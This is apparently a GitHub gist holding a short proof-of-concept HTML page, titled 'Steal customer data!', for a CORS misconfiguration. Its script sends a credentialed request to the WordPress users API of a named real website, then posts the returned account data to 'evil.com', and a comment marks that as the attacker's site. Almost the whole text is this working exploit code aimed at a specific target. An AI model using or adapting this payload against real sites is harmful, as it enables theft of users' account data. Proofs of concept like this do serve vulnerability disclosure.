Skip to content

Instantly share code, notes, and snippets.

@andripwn
Created June 13, 2020 12:34
Show Gist options
  • Save andripwn/631549458828e3c78cb98ada9f80b179 to your computer and use it in GitHub Desktop.
Save andripwn/631549458828e3c78cb98ada9f80b179 to your computer and use it in GitHub Desktop.
<!DOCTYPE html>
<html>
<body>
<center>
<h3>Steal customer data!</h3>
<html>
<body>
<button type='button' onclick='cors()'>Exploit</button>
<p id='demo'></p>
<script>
function cors() {
var xhttp = new XMLHttpRequest();
xhttp.onreadystatechange = function() {
if (this.readyState == 4 && this.status == 200) {
var a = this.responseText; // Sensitive data from datacommcloud.co.id about user account
document.getElementById("demo").innerHTML = a;
xhttp.open("POST", "http://evil.com", true);// Sending that data to Attacker's website
xhttp.withCredentials = true;
console.log(a);
xhttp.send("data="+a);
}
};
xhttp.open("GET", "https://datacommcloud.co.id/wp-json/wp/v2/users/", true);
xhttp.withCredentials = true;
xhttp.send();
}
</script>
</body>
</html>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment